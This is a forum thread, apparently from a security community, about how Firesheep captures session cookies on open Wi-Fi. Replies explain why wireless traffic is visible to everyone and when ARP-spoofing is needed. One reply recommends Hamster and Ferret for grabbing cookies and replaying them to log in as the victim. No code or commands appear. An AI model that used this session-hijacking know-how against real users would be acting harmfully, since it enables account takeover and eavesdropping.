Jump to content

Firesheep - How Does It Obtain The Session Cookie?


Recommended Posts


I have a couple of questions about Firesheep.

AIUI, it works when - although the logon is HTTPS - the cookie sent by the server immediately after the logon is finished is sent through HTTP. Therefore, Firesheep is defeated by constant HTTPS (as can happen in Gmail and Facebook for example).

What I do not understand having read (http://codebutler.com/firesheep) is whether the Firesheep user is operating as a MITM in order to obtain the session cookie. In the episode (http://hak5.org/episodes/episode-906) it looks as if Shannon is using Cain to ARPspoof Darren before using Firesheep. However, there is no mention of ARPspoofing on the coder's site and instead he says "On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy."

Is this really the situation? Why would a cookie be sent to anyone on the wireless network rather than to the actual client who has just logged in? And, therefore, how exactly does Firesheep obtain the session cookie?


Link to comment
Share on other sites

Better to use hamster and ferret, as it doesn't require a site profile to grab the cookies. Hamster any ferret will work on any site. Basically its a packet capture tool, kind of like wireshark and tcpdump, but specializes in pulling the cookies out of the packets and associating them with the site they came from. You can then dump them to your browser and login as the end user. You could also do this manually with wireshark and a card in monitor mode on an unencrypted network, but its a pain in the ass to have to enter them all by hand when tools do it for you.

Edited by digip
Link to comment
Share on other sites

On wired networks or wpa enterprise networks you need to do a mitm first.

WiFi networks work like a hub, everyone receives the traffic(you can't direct those radiowaves to every client individually), so on open networks you can get those cookies(and all other traffic of course!), on WEP networks you can do the same if you know/crack the password, and on WPA networks you can do the same if you know/crack the password AND capture the handshake of the user(s) who you are trying to sniff.

The cookie itself is just sent in plain text(you can verify this with wireshark), so if you can see the traffic, you can see the cookie.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...